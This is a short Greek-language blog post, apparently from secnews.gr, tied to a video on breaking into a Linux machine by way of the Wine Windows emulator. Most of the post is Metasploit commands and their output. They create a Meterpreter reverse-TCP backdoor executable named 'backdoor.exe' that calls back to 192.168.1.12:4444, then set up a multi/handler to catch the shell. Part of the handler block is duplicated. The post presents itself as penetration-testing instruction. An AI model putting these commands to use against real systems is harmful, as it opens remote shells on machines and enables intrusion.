Αποκτήσετε πρόσβαση μέσω μιας εφαρμογής προσομοίωσης Windows στο Linux
Το Metasploit είναι ένα υπέροχο εργαλείο για penetration testing, καθώς περιλαμβάνει μια βάση με exploits για την παραβίαση λειτουργικών συστημάτων, πολύ χρήσιμη για ειδικούς ασφάλειας.
Παρακάτω θα παρακολουθήσετε ένα βίντεο στο οποίο εμφανίζονται τεχνικές παραβίασης για λειτουργικό σύστημα Linux. Στο βίντεο θα μάθετε<…>
πως μέσω μιας εφαρμογής προσομοίωσης Windows, μπορείτε να αποκτήσετε πρόσβαση σε ένα μηχάνημα που χρησιμοποιεί Linux.
Η εφαρμογή αυτή ονομάζεται wine και θα εντοπίσουμε παρακάτω τις ευπάθειες που διαθέτει, οι οποίες μπορούν να γίνουν εκμεταλλεύσιμες έτσι ώστε να παραβιάσουμε ένα μηχάνημα Linux.
Εντολές:
root@bt:~# msfpayload windows/meterpreter/reverse_tcplhost=192.168.1.12 lport=4444 X > backdoor.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {«lhost»=>»192.168.1.12″, «lport»=>»4444″}
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {«lhost»=>»192.168.1.12″, «lport»=>»4444″}
Metasploit commands
msf> use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.12
lhost => 192.168.1.12
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > exploit
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.12
lhost => 192.168.1.12
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.12:4444
[*] Starting the payload handler…
[*] Starting the payload handler…
Πηγή:secnews.gr
Δεν υπάρχουν σχόλια